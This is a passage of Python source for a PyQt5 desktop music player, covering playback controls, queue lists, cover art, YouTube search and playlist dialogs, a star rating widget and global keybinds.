slider = DurationSlider(self.seek)
slider.setMinimumHeight(20)
slider.setMinimumWidth(100)
slider.setMaximum(2000)
slider.setBaseSize(QtCore.QSize(800, 20))
slider.setSizePolicy(QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed))
slider.setOrientation(QtCore.Qt.Horizontal)
slider.setStyleSheet(self.stylesheet)
dur = QLabel()
self.total_dur = '00:00/00:00'
dur.setText(self.total_dur)
dur.setBaseSize(QtCore.QSize(70, 30))
dur.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
mid_layout.addWidget(self.title, 0, 0, Qt.AlignLeft)
mid_layout.addWidget(self.rating, 0, 1, Qt.AlignRight)
mid_layout.addWidget(dur, 0, 2, Qt.AlignRight)
mid_layout.addWidget(slider, 1, 0, 1, 3)
w = QWidget()
w.setLayout(mid_layout)
self.addWidget(w)
self.slider = slider
self.dur = dur
def play_pause(self, button):
self.playing = self.player.pause()
self.player.unpaused.set()
self.set_play_icon(button)
def set_play_icon(self, button):
if self.playing is None or self.playing is False:
button.set_icon('icons/play_white.png')
self.playing = False
else:
self.playing = True
button.set_icon('icons/pause_white.png', False)
def change_rating(self, score):
if self.current is not None:
self.current.rating = score
def next(self, button):
self.player.play_next_song()
self.playing = False
self.set_play_icon(self.play)
def previous(self, button):
if self.player.current is None:
index = self.player.index - 1
else:
index = self.player.current.index - 1
self.player.skip_to(index)
self.playing = False
self.set_play_icon(self.play)
def song_changed(self, song):
self.current = song
self.total_dur = song.duration_formatted
self.dur.setText('00:00/{}'.format(self.total_dur))
name, author = song.get_name_and_author()
self.title.setText('{} - {}'.format(author, name))
self.rating.set_value(song.rating)
def player_start(self, player_):
self.playing = True
self.set_play_icon(self.play)
def update_duration(self, stream_player):
iteration = stream_player.duration
total = self.player.current.duration
if total is None:
total = 1
self.dur.setText(parse_duration(iteration) + '/' + self.total_dur)
if not self.slider.dragging:
self.slider.setSliderPosition(int(self.slider.maximum()*(iteration/total)))
def seek(self, slider):
if self.player.not_playing.is_set():
return
if self.seek_lock.acquire(False):
t = threading.Thread(target=self._seek, args=(slider, self.seek_lock,))
t.start()
def _seek(self, slider, lock):
try:
if slider.value() == slider.maximum():
self.player.play_next_song()
return
total = self.player.current.duration
seconds = slider.value()/slider.maximum()*total
self.player.stream_player.seek(seconds, self.player.current.ffmpeg)
finally:
lock.release()
class CoverArt(QLabel):
def __init__(self, default_image='download.png'):
super().__init__()
self.pixmap = QtGui.QPixmap(default_image)
self.default_image = default_image
def paintEvent(self, event):
size = self.size()
painter = QPainter(self)
point = QPoint(0, 0)
scaledPix = self.pixmap.scaled(size, QtCore.Qt.KeepAspectRatio,
QtCore.Qt.SmoothTransformation)
point.setX((size.width() - scaledPix.width())/2)
point.setY((size.height() - scaledPix.height())/2)
painter.drawPixmap(point, scaledPix)
def change_pixmap(self, img, update=True):
if img is None:
img = self.default_image
self.pixmap = QPixmap(img)
if update:
self.update()
def change_pixmap_from_data(self, data, update=True):
self.pixmap = QPixmap()
self.pixmap.loadFromData(data)
if update:
self.update()
def heightForWidth(self, width):
return width
class PlaylistDialog(QDialog):
def __init__(self, after_info, *args, extract_flat=True):
super().__init__(*args)
self.setMinimumSize(200, 25)
self.text_edit = QLineEdit(self)
self.after_info = after_info
self.text_edit.returnPressed.connect(self.get_playlist)
self.ready = True
self.extract_flat = extract_flat
def get_playlist(self, *args):
if self.ready is False:
return
self.ready = False
text = self.text_edit.text()
if text is None or len(text) < 2:
return
dl = session.downloader
future = dl.get_info(text, flat=self.extract_flat)
future.add_done_callback(self.after_info)
session.temp_futures.append(future)
class ADialog(QDialog):
def __init__(self, after_info, *args, extract_flat=True):
super().__init__(*args)
self.setMinimumSize(200, 25)
self.text_edit = QLineEdit(self)
self.after_info = after_info
self.text_edit.returnPressed.connect(self.get_playlist)
self.ready = True
self.extract_flat = extract_flat
def get_playlist(self, *args):
if self.ready is False:
return
self.ready = False
text = self.text_edit.text()
dl = session.downloader
future = dl.get_info(text, flat=self.extract_flat)
future.add_done_callback(self.after_info)
session.temp_futures.append(future)
class SearchDialog(QDialog):
def __init__(self, *args):
super().__init__(*args)
self.setMinimumSize(200, 385)
self.list = SearchListWidget()
self.list.setIconSize(QSize(75, 75))
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
size_policy.setHorizontalStretch(3)
self.list.setSizePolicy(size_policy)
self.text_edit = QLineEdit()
self.text_edit.returnPressed.connect(self.on_enter)
self.text_edit.setBaseSize(150, 25)
self.text_edit.setMaximumHeight(25)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
self.text_edit.setSizePolicy(size_policy)
self.box = QVBoxLayout(self)
self.box.addWidget(self.text_edit)
self.box.addWidget(self.list)
self.list.setItemDelegate(SongItemDelegate(True, parent=self))
self.list.setUniformItemSizes(True)
self.list.setMinimumSize(150, 250)
self.downloader = DownloaderPool()
def on_enter(self, *args):
text = self.text_edit.text()
if text is None or len(text) == 0:
return
search = 'ytsearch5:%s' % text
future = self.downloader.get_info(search)
future.add_done_callback(self.on_ready)
def on_ready(self, future):
info = future.result()
if info is None:
return
self.list.hovered = None
self.list.clear()
for entry in info['entries']:
self.list.addItem(SearchItem(entry))
class SearchItem(QListWidgetItem):
def __init__(self, info, *args):
super().__init__(*args)
self.setSizeHint(QSize(150, 75))
self.info = info
self.setText('{}\r\n{}'.format(info.get('title', 'Untitled'), info.get('uploader', 'Unknown')))
self.setData(Qt.UserRole, parse_duration(info.get('duration', 0)))
self.setBackground(QBrush(QColor(167, 218, 245, 0)))
if 'thumbnail' in info:
url = info.get('thumbnail')
r = requests.get(url, stream=True)
pixmap = QPixmap()
pixmap.loadFromData(r.content)
self.setIcon(QIcon(pixmap.scaled(QSize(80, 80), Qt.KeepAspectRatio,
Qt.SmoothTransformation)))
class BaseListWidget(QListWidget):
unchecked_color = QBrush(QColor(0, 0, 0, 0))
checked_color = QBrush(QColor('#304FFE'))
hover_color = QBrush(QColor(48, 79, 254, 150))
def __init__(self, *args):
super().__init__(*args)
self.hovered = None
self.currently_selected = None
self.setMouseTracking(True)
self.setUniformItemSizes(True)
def _change_hovered_from_event(self, event):
item = self.itemAt(event.pos())
if item == self.hovered:
return
self.change_hovered(item)
def change_hovered(self, item):
def set_hovered(_item):
self.hovered = _item
if _item.checkState() == Qt.Checked:
return
_item.setBackground(self.hover_color)
if item is None:
if self.hovered is None:
return
color = self.checked_color if self.hovered.checkState() == Qt.Checked else self.unchecked_color
self.hovered.setBackground(color)
self.hovered = None
return
if self.hovered is None:
set_hovered(item)
else:
color = self.checked_color if self.hovered.checkState() == Qt.Checked else self.unchecked_color
self.hovered.setBackground(color)
set_hovered(item)
def wheelEvent(self, event):
super().wheelEvent(event)
self._change_hovered_from_event(event)
def mouseMoveEvent(self, event):
self._change_hovered_from_event(event)
def change_selected(self, item):
if self.currently_selected is not None:
self.currently_selected.setBackground(self.unchecked_color)
self.currently_selected.setCheckState(Qt.Unchecked)
self.currently_selected = item
if item is not None:
item.setCheckState(Qt.Checked)
item.setBackground(self.checked_color)
def on_item_clicked(self, item):
if item is not None:
if item.checkState() == Qt.Unchecked:
self.change_selected(item)
else:
if self.currently_selected is item:
return
item.setCheckState(Qt.Unchecked)
item.setBackground(self.unchecked_color)
if self.currently_selected is not None:
self.currently_selected.setCheckState(Qt.Unchecked)
self.currently_selected = None
class SearchListWidget(BaseListWidget):
def __init__(self, *args):
super().__init__(*args)
self.itemClicked.connect(self.on_item_clicked)
self.itemDoubleClicked.connect(self.on_doubleclick)
@staticmethod
def on_doubleclick(item):
player.play_from_search(item.info)
class SongList(BaseListWidget):
items_updated = pyqtSignal(int)
def __init__(self, player_, session_, settings_manager_, icons, cover_art):
super().__init__()
self.last_doubleclicked = None
self.player = player_
self.settings_manager = settings_manager_
self.icons = icons
self.cover_art = cover_art
self.setItemDelegate(SongItemDelegate(parent=self, paint_icons=self.settings.value('paint_icons', True)))
self.itemClicked.connect(self.on_item_clicked)
self.itemDoubleClicked.connect(self.on_doubleclick)
self.session = session_
self.items = {GV.MainQueue: [], GV.SecondaryQueue: [], GV.MarkedQueue: []}
self.items_updated.connect(self.list_updated)
self.items_updated.emit()
self.timer = QTimer()
self.icon_timer = QTimer()
self.icon_timer.setSingleShot(True)
self.icon_timer.timeout.connect(self.load_current_index)
self.item_pages = deque()
self.item_page = 0
self.page_length = 20
self.loaded_pages = deque()
self.current_queue = self.settings.value('queue', GV.MainQueue)
self.verticalScrollBar().valueChanged.connect(self.on_scroll)
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.change_song)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
def list_updated(self, queue_id):
if queue_id != self.current_queue:
return
self.load_current_queue()
@property
def current_items(self):
return self.items[self.current_queue]
def item_list(self, list_type=list):
q = list_type()
for i in range(self.count()):
q.append(self.item(i))
return q
def scroll_to_selected(self):
current = self.player.current
if current is not None:
self.scrollToItem(current)
self.load_items_by_index(current.song.index)
def shuffle_queue(self):
items = self.item_list()
shuffle(items)
self.clear_items()
queue = self.session.queues[self.current_queue]
queue.clear()
for idx, item in enumerate(items):
item.song.index = idx
self.add_from_item(item)
queue.append(item.song)
def load_last_queue(self):
self.change_selected(None)
if self.current_queue == GV.MainQueue:
self.current_queue = GV.SecondaryQueue
index = self.session.secondary_index
self.session.main_index = self.session.index
else:
self.current_queue = GV.MainQueue
index = self.session.main_index
self.session.secondary_index = self.session.index
self.session.index = index
self.settings.setValue('queue', self.current_queue)
self.load_current_queue()
self.player.skip_to(index, self.item(index))
self.load_items_by_index(index)
self.scrollToItem(self.item(index))
def load_current_queue(self):
self.clear_items()
q = self.session.queues[self.current_queue]
for song in q:
item = self.add_list_item(song)
self.add_to_item_page(item)
self.load_current_index()
self.player.update_queue(self.current_queue)
def clear_items(self):
self.currently_selected = None
self.current_items.clear()
self.reset_item_page()
while self.count() > 0:
self.takeItem(0)
def load_current_index(self):
self.load_items_by_index(self.verticalScrollBar().value())
def on_scroll(self, value):
self.icon_timer.stop()
self.icon_timer.start(250)
def contextMenuEvent(self, event):
item = self.itemAt(event.pos())
trim_action = None
cover_art_action = None
search = None
menu = QMenu(self)
if item is not None:
trim_action = menu.addAction('Trim cover art borders')
cover_art_action = menu.addAction('Update cover art')
search = menu.addAction('Search')
playlist = menu.addAction('Play playlist')
switch_action = menu.addAction('switch q')
vid_q = menu.addAction('Add to secondary queue')
shuffle_action = menu.addAction('Shuffle queue')
clear_action = menu.addAction('Clear this queue')
action = menu.exec_(self.mapToGlobal(event.pos()))
if action == trim_action:
try:
item.song.trim_cover_art()
main_window.update()
except Exception as e:
print('exception while trimming. %s' % e)
elif action == cover_art_action:
item.song.set_cover_art(forced=True)
elif action == search:
dialog = SearchDialog(self.parent())
dialog.exec_()
elif action == playlist:
dia = PlaylistDialog(self._playlist_from_future, self.parent())
dia.exec_()
elif action == switch_action:
self.load_last_queue()
elif action == vid_q:
d = ADialog(self.append_to_queue_future, self.parent(), extract_flat=False)
d.exec_()
elif action == shuffle_action:
self.shuffle_queue()
elif action == clear_action:
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle('Confirm list clearing')
message_box.setInformativeText('Are you sure you want to clear this list')
message_box.addButton('Cancel', QMessageBox.RejectRole)
message_box.addButton('Yes', QMessageBox.AcceptRole)
if message_box.exec_() == QMessageBox.Accepted:
self.clear_current_queue()
def clear_current_queue(self):
self.clear_items()
current = self.current_queue
queue = self.session.queues.get(current, [])
queue.clear()
def _add_from_info(self, info, link_getter=None):
songs = []
q = self.session.queues[GV.SecondaryQueue]
l = len(q)
session = db.get_thread_local_session()
for idx, entry in enumerate(info['entries']):
if callable(link_getter):
link = link_getter(entry)
else:
link = entry.get('webpage_url')
song = db.get_temp_song(entry.get('title', 'Untitled'),
link, item_type='link',
session=session, commit=False)
session.expunge(song)
item = Song(song, db, self.session.downloader, index=idx + l)
self.session.add_to_queue(item, queue=GV.SecondaryQueue)
songs.append(item)
session.commit()
session.close()
db.Session.remove()
if self.current_queue == GV.SecondaryQueue:
self.load_songs(songs)
self.load_items_by_page(self.item_page)
print('done')
metadata_updater.add_to_update(songs)
def append_to_queue_future(self, future):
info = future.result()
if info is None:
return
if 'entries' not in info:
return
self._add_from_info(info)
def _playlist_from_future(self, future):
info = future.result()
if info is None:
return
if info['extractor_key'].lower() != 'youtubeplaylist':
return
if 'entries' not in info:
return
def link(entry):
return 'https://www.youtube.com/watch?v=%s' % entry.get('id')
self._add_from_info(info, link)
def load_songs(self, queue):
_queue = []
for item in queue:
_queue.append(self.add_list_item(item))
return _queue
def leaveEvent(self, event):
self.change_hovered(None)
def addItem(self, item, *args):
super().addItem(item, *args)
self.current_items.append(item)
if self.currently_selected is None:
self.currently_selected = item
item.setBackground(self.checked_color)
item.setCheckState(Qt.Checked)
def change_song(self):
if self.last_doubleclicked is not None:
settings = self.settings
index = self.indexFromItem(self.last_doubleclicked).row()
self.player.skip_to(index, self.last_doubleclicked)
self.session.index = index
settings.setValue('index', index)
if self.current_queue == GV.MainQueue:
self.session.main_index = index
settings.setValue('main_index', index)
elif self.current_queue == GV.SecondaryQueue:
self.session.secondary_index = index
settings.setValue('secondary_index', index)
def on_doubleclick(self, item):
if item is not None:
self.timer.stop()
self.last_doubleclicked = item
self.timer.start(200)
def reset_item_page(self):
self.item_page = 0
self.unload_pages()
self.item_pages.clear()
self.load_current_index()
def get_item_page(self):
if len(self.item_pages) == 0:
self.item_page = 0
self.item_pages.append([])
return self.item_pages[self.item_page]
else:
return self.item_pages[self.item_page]
def add_item_page(self):
page = []
self.item_pages.append(page)
return page
def add_to_item_page(self, item):
page = self.get_item_page()
if len(page) >= self.page_length:
page = self.add_item_page()
self.item_page += 1
page.append(item)
def load_items_by_page(self, page_index):
try:
page = self.item_pages[page_index]
except IndexError:
return
self.loaded_pages.append((page, page_index))
for item in page:
item.update_info()
item.load_icon()
@staticmethod
def unload_page(page):
for item in page:
item.unload_icon()
def unload_pages(self, index_whitelist=None):
if index_whitelist is None:
index_whitelist = []
indexes = []
for idx, p_i in enumerate(self.loaded_pages):
page, index = p_i
if index in index_whitelist:
continue
indexes.append(idx)
self.unload_page(page)
indexes.reverse()
for idx in indexes:
del self.loaded_pages[idx]
def load_items_by_index(self, index):
page = int(index/self.page_length)
down = page - 1
up = page + 1
try:
self.load_items_by_page(page)
if len(self.item_pages) > up:
self.load_items_by_page(up)
if down >= 0:
self.load_items_by_page(down)
except Exception as e:
print(e)
try:
self.unload_pages([page, up, down])
except Exception as e:
print(e)
def _add_item(self, item, is_selected=False):
song = item.song
name, author = song.get_name_and_author()
item.setText('{}\r\n{}'.format(name, author))
item.setData(Qt.UserRole, song.duration_formatted)
if is_selected:
item.setCheckState(Qt.Checked)
item.setBackground(self.checked_color)
self.change_selected(item)
song.index = self.count()
self.addItem(item)
self.add_to_item_page(item)
return item
def add_from_item(self, item, is_selected=False):
return self._add_item(item, is_selected)
def add_list_item(self, song, is_selected=False):
item = SongItem(song)
return self._add_item(item, is_selected)
class SongItem(QListWidgetItem):
def __init__(self, song, icon_displayed=False, *args):
super().__init__(*args)
self.setFlags(self.flags() | Qt.ItemIsUserCheckable)
self.setCheckState(Qt.Unchecked)
self.setBackground(QBrush(QColor(167, 218, 245, 0)))
self.setSizeHint(QSize(150, 75))
self.song = song
self.img = None
self.icon_displayed = icon_displayed
self.song.on_cover_art_changed = self.update_icon
self.song.after_download = self.update_info
self.loaded = False
def unload_icon(self):
self.setIcon(QIcon())
self.del_from_icons()
self.img = None
self.loaded = False
def del_from_icons(self):
icons = getattr(session, 'icons', {})
if self.img in icons:
uses = icons[self.img][1]
if uses <= 1:
del icons[self.img]
else:
icons[self.img] = (icons[self.img][0], uses - 1)
def load_icon(self):
self._load_icon()
self.loaded = True
def _load_icon(self):
img = self.song.cover_art
if img is None or self.img == img:
return
self.img = img
icons = getattr(session, 'icons', {})
if img in icons:
icon, uses = icons[img]
icons[img] = (icon, uses + 1)
else:
pixmap = QPixmap(img)
icon = QIcon(pixmap.scaled(QSize(75, 75), Qt.KeepAspectRatio, Qt.SmoothTransformation))
icons[img] = (icon, 1)
self.del_from_icons()
self.setIcon(icon)
def update_icon(self, song=None):
if not self.loaded:
return
self.load_icon()
def unload_info(self):
self.setText('')
self.setData(Qt.UserRole, None)
def update_info(self, song=None):
self.setText('{}\r\n{}'.format(*self.song.get_name_and_author()))
self.setData(Qt.UserRole, self.song.duration_formatted)
self.update_icon()
class SongItemDelegate(QStyledItemDelegate):
def __init__(self, paint_icons=True, padding=5, parent=0):
super().__init__(parent)
self.padding = padding
self.paint_icons = paint_icons
@staticmethod
def _check_width(fontmetrics, s, max_width):
text_width = fontmetrics.width(s)
average = fontmetrics.averageCharWidth()
characters = int(max_width / average)
offset = 0
while text_width > max_width:
if offset > 3:
break
s = s[:characters - offset]
text_len = len(s)
if text_len > 3:
s = s[:-3] + '...'
text_width = fontmetrics.width(s)
offset += 1
return s
def paint(self, painter, option, index):
painter.setPen(QPen(Qt.NoPen))
bg_brush = index.data(Qt.BackgroundRole)
painter.setBrush(bg_brush)
painter.drawRect(option.rect)
width = min(option.rect.width(), painter.device().width())
height = option.rect.height()
x = option.rect.x()
y = option.rect.y()
title, author = index.data().split('\r\n', maxsplit=1)
pixmap_width = 0
if self.paint_icons:
icon = index.data(Qt.DecorationRole)
if icon is not None:
painter.setPen(QPen(Qt.NoPen))
pixmap = icon.pixmap(QSize(height, height))
pixmap_y = y + (height - pixmap.height())/2
painter.drawPixmap(QPoint(x, pixmap_y), pixmap)
pixmap_width = pixmap.width()
used_width = x + pixmap_width + self.padding
duration = str(index.data(Qt.UserRole))
dur_width = painter.fontMetrics().width(duration) + self.padding*3
usable_width = width - pixmap_width - dur_width
title = self._check_width(painter.fontMetrics(), title, usable_width)
author = self._check_width(painter.fontMetrics(), author, usable_width)
font_height = painter.fontMetrics().height()
painter.setPen(QPen(Qt.white))
painter.drawText(QRectF(used_width, y, usable_width, height), Qt.AlignLeft, title)
painter.setPen(QPen(Qt.gray))
painter.drawText(QRectF(used_width, y + font_height + self.padding, usable_width - self.padding, height - self.padding - font_height),
Qt.AlignLeft, author)
painter.drawText(QRectF(width - dur_width, y, dur_width - self.padding, height),
Qt.AlignRight, duration)
class RatingBar(QWidget):
def __init__(self, *args, on_change=None):
super().__init__(*args)
size_policy = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.setSizePolicy(size_policy)
self.setMouseTracking(True)
self._value = 0
self.maximum = 10
self.padding = 1
self.setFixedWidth((20 + self.padding)*5)
self.setFixedHeight(20)
self.on_change = on_change
self.full_star = Icons.FullStar
self.half_star = Icons.HalfStar
self.empty_star = Icons.EmptyStar
self.scale_stars()
def scale_stars(self):
star_width = int((self.width() - self.padding*5)/5)
self.full_star = Icons.FullStar.scaledToWidth(star_width, Qt.SmoothTransformation)
self.half_star = Icons.HalfStar.scaledToWidth(star_width, Qt.SmoothTransformation)
self.empty_star = Icons.EmptyStar.scaledToWidth(star_width, Qt.SmoothTransformation)
@property
def value(self):
return self._value
def set_value(self, value, update=True):
if isinstance(value, int):
self._value = value
if update:
self.update()
def mouseMoveEvent(self, event):
super().mouseMoveEvent(event)
if event.buttons() == Qt.LeftButton:
self.set_value(int(ceil(event.x() / self.width() * self.maximum)))
def mousePressEvent(self, event):
if event.button() == 1:
self.set_value(int(ceil(event.x() / self.width() * self.maximum)))
def mouseReleaseEvent(self, event):
if event.button() == 1 and callable(self.on_change):
self.on_change(self.value)
def paintEvent(self, event):
rect = event.rect()
x = rect.x()
y = rect.y()
star_width = int((self.width() - self.padding*5)/5)
pos = 0
painter = QPainter(self)
full_stars, half_stars = divmod(self.value, 2)
empty_stars = int((self.maximum - self.value)/2)
def draw_pixmap(pixmap):
nonlocal pos
target = QtCore.QPointF(x + pos, y)
painter.drawPixmap(target, pixmap)
pos += star_width + self.padding
while full_stars > 0:
draw_pixmap(self.full_star)
full_stars -= 1
while half_stars > 0:
draw_pixmap(self.half_star)
half_stars -= 1
while empty_stars > 0:
draw_pixmap(self.empty_star)
empty_stars -= 1
class SongInfoBox(QFrame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setLineWidth(0)
self.setMidLineWidth(1)
self.setFrameShape(QFrame.Box | QFrame.Plain)
self.setMinimumHeight(10)
self.setMaximumHeight(150)
size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)
self.setSizePolicy(size_policy)
layout = QGridLayout()
layout.setSpacing(3)
self.title = QLabel()
self.title.setWordWrap(True)
self.title.setAlignment(Qt.AlignTop | Qt.AlignLeft)
self.artist = QLabel()
self.artist.setWordWrap(True)
self.artist.setAlignment(Qt.AlignBottom | Qt.AlignLeft)
self.duration = QLabel()
self.duration.setAlignment(Qt.AlignBottom | Qt.AlignRight)
layout.addWidget(self.title, 0, 0, 1, 2)
layout.addWidget(self.artist, 1, 0, 1, 2)
layout.addWidget(self.duration, 1, 2, 1, 1)
self.setLayout(layout)
def update_info(self, song):
title, author = song.get_name_and_author()
self.title.setText(title)
self.artist.setText(author)
self.duration.setText(song.duration_formatted)
class QueueWidget(QWidget):
song_changed = pyqtSignal(object, bool, int, bool, bool)
def __init__(self, settings_manager_, db_, player_, keybinds_, session_, media_controls, *args):
super().__init__(*args)
self.db = db_
self.player = player_
self.player.on_next = self.song_changed
self.kb = keybinds_
self.session = session_
self.settings_manager = settings_manager_
logger.debug('Creating widgets')
self.media_controls = media_controls
self.media_controls.set_rating = self.change_rating
logger.debug('Media controls created')
layout = QGridLayout()
layout.setGeometry(QtCore.QRect())
logger.debug('Cover art created')
h = QHBoxLayout()
cover_art = CoverArt()
size_policy = QSizePolicy()
size_policy.setHorizontalStretch(6)
cover_art.setSizePolicy(size_policy)
self.song_info = SongInfoBox()
icons = {}
song_list = SongList(player_, session_, settings_manager_, icons, cover_art)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
size_policy.setHorizontalStretch(3)
size_policy.setVerticalStretch(10)
song_list.setMinimumWidth(350)
song_list.setSizePolicy(size_policy)
song_list.setIconSize(QSize(75, 75))
song_list.setResizeMode(song_list.Adjust)
song_list.setSpacing(3)
self.list = song_list
logger.debug('Songlist added. now adding songs.')
index = self.settings.value('index', 0)
db_queue = getattr(self.db, self.player.queues.get(self.player.queue_mode, 'history'))
if callable(db_queue):
db_queue()
setattr(self.session, 'icons', icons)
self.list.current_queue = self.settings.value('queue', GV.MainQueue)
logger.debug('Songs added')
self.list.load_current_queue()
player.update_queue(self.list.current_queue)
try:
item = self.list.item(index)
except IndexError:
pass
else:
if item is not None:
self.list.scrollToItem(item)
self.list.load_items_by_index(index)
self.list.change_selected(item)
logger.debug('Scrolled to index %s' % index)
if item.song.cover_art is not None:
cover_art.change_pixmap(item.song.cover_art)
self.media_controls.song_changed(item.song)
self.song_info.update_info(item.song)
self.player.skip_to(index, item)
cover_art.setBaseSize(400, 400)
cover_art.setMinimumSize(100, 100)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
size_policy.setHorizontalStretch(4)
cover_art.setSizePolicy(size_policy)
cover_art.setScaledContents(True)
self.cover_art = cover_art
self.song_box = QVBoxLayout()
self.song_box.addWidget(self.list)
self.song_box.addWidget(self.song_info)
h.addWidget(self.cover_art)
h.addLayout(self.song_box, 4)
layout.addLayout(h, 0, 0, 1, 4)
self.setLayout(layout)
logger.debug('Layout complete')
self.song_changed.connect(self.on_change)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
def change_rating(self, score):
index = getattr(self.session, 'index', None)
if index is None:
return
item1 = self.player.current
item2 = self.list.item(index)
if item1 is not None and item1 is item2:
item1.song.rating = score
@staticmethod
def dl_img(url):
return requests.get(url).content
def on_change(self, song, in_list=False, index=0, force_repaint=True, add=False):
song.set_cover_art()
item = None
if in_list:
item = self.list.item(index)
if item is not None and item != 0:
encoding = sys.stdout.encoding or 'utf-8'
print(index, song.index, song.name.encode('utf-8').decode(encoding, errors='replace'))
self.list.change_selected(item)
item.setData(Qt.UserRole, song.duration_formatted)
item.setText('{}\r\n{}'.format(*song.get_name_and_author()))
setattr(self.session, 'index', index)
self.settings.setValue('index', index)
elif add:
item = self.list.add_list_item(song, is_selected=True)
self.media_controls.song_changed(song)
self.song_info.update_info(song)
logger.debug('changing cover_art in main window')
if song.cover_art is None:
logger.debug('cover_art is None')
img = song.info.get('thumbnail', None)
if img is None:
img = os.path.join(os.getcwd(), 'icons', 'download.png')
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap(img, force_repaint)
else:
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap_from_data(self.dl_img(img), force_repaint)
else:
img = song.cover_art
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap(img, force_repaint)
setattr(self.session, 'cover_art', img)
if item is not None:
logger.debug('Setting icon to %s' % img)
item.setIcon(QIcon(img))
logger.debug('icon set')
if force_repaint:
logger.debug('Updating window')
self.update()
# scrollToItem has to be called after self.update() or the program crashes
if self.settings.value('scroll_on_change', True) and item is not None:
self.list.scrollToItem(item)
logger.debug('Items added and cover art changed')
class ProxyStyle(QProxyStyle):
def __init__(self, *args):
super().__init__(*args)
def pixelMetric(self, metric, option=None, widget=None):
if metric == QStyle.PM_SmallIconSize:
return 25
else:
return super().pixelMetric(metric, option, widget)
class MainWindow(QMainWindow):
def __init__(self, settings_manager_, db_, player_, keybinds_, session_, *args):
super().__init__(*args)
self.db = db_
self.player = player_
self.kb = keybinds_
self.session = session_
self.settings_manager = settings_manager_
self.media_controls = MediaControls(self.player)
self.main_stack = QStackedWidget()
self.queue_widget = QueueWidget(settings_manager_, db_, player_, keybinds_, session_, self.media_controls)
self.queue_widget_index = self.main_stack.insertWidget(-1, self.queue_widget)
columns = [Column(key, getattr(DBSong, key), key, **GV.TableColumns[key])
for key in attribute_names(DBSong) if key in GV.TableColumns.keys()]
model = SQLAlchemyTableModel(db_, columns, self.db.items(DBSong))
self.table_view = SongTable(model)
self.table_view_index = self.main_stack.insertWidget(-1, self.table_view)
self.setCentralWidget(self.main_stack)
self.bottom_dock = QDockWidget(self)
self.bottom_dock.setTitleBarWidget(QWidget()) # Removes title bar
widget = QWidget()
widget.setLayout(self.media_controls)
h = self.media_controls.minimumSize().height()
self.bottom_dock.setMaximumHeight(h)
self.bottom_dock.setMinimumHeight(h)
self.bottom_dock.setWidget(widget)
self.bottom_dock.setAllowedAreas(Qt.BottomDockWidgetArea | Qt.TopDockWidgetArea)
self.bottom_dock.setFeatures(QDockWidget.DockWidgetMovable)
self.bottom_dock.show()
self.addDockWidget(Qt.BottomDockWidgetArea, self.bottom_dock)
menu = self.menuBar().addMenu(Icons.Menu, 'Preferences')
action = menu.addAction('test')
action.triggered.connect(self.change_stack)
self.restore_position_settings()
def change_stack(self, checked=False):
if self.main_stack.currentIndex() == self.table_view_index:
self.main_stack.setCurrentIndex(self.queue_widget_index)
else:
self.main_stack.setCurrentIndex(self.table_view_index)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
# http://stackoverflow.com/a/8736705/6046713
def save_position_settings(self):
settings = self.settings_manager.get_unique_settings_inst()
settings.beginGroup('mainwindow')
settings.setValue('geometry', self.saveGeometry())
settings.setValue('savestate', self.saveState())
settings.setValue('maximized', self.isMaximized())
if not self.isMaximized():
settings.setValue('pos', self.pos())
settings.setValue('size', self.size())
settings.endGroup()
def restore_position_settings(self):
settings = self.settings_manager.get_unique_settings_inst()
settings.beginGroup('mainwindow')
self.restoreGeometry(settings.value('geometry', self.saveGeometry()))
self.restoreState(settings.value('savestate', self.saveState()))
self.move(settings.value('pos', self.pos()))
self.resize(settings.value('size', self.size()))
maximized = settings.value('maximized', self.isMaximized())
if maximized is True or maximized == 'true':
self.showMaximized()
settings.endGroup()
def closeEvent(self, event):
self.save_position_settings()
import logging
logger = logging.getLogger('debug')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(filename='debug.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setApplicationName('Music player')
app.setOrganizationName('s0hvaperuna')
app.setStyle(ProxyStyle())
Icons.create_icons()
settings_manager = SettingsManager()
session = SessionManager()
metadata_updater = MetadataUpdater(session)
metadata_updater.start()
db = DBHandler('yttest', session)
player = GUIPlayer(None, None, None, session, GUIPlayer.SHUFFLED, db, 0.2, daemon=True)
keybinds = KeyBinds(global_binds=True)
main_window = MainWindow(settings_manager, db, player, keybinds, session)
def close_event(lock=None):
player.exit_player(lock)
main_window.close()
keybinds.add_keybind(KeyBind(ord('3'), player.play_next_song,
'Skip song', modifiers=(KeyCodes.id_from_key('ctrl'),)))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('subtract'), player.change_volume,
'Volume down'))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('add'), lambda: player.change_volume(True),
'Volume up'))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('numpad 5'), close_event,
'Quit player', threaded=True,
modifiers=(KeyCodes.id_from_key('ctrl'),)))
player.start()
session.start()
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
at_exit(run_funcs_on_exit, [(session.save_session, (), {}), (db.shutdown, (), {})])
main_window.show()
db.delete_history()
timer = QTimer()
# Message pump has to be on the same thread as Qt or keyboard presses might
# cause random crashes.
timer.timeout.connect(keybinds.pump_messages)
timer.setInterval(10)
timer.start()
app.exec_()
metadata_updater.stop()
player.exit_player()
keybinds.stop()
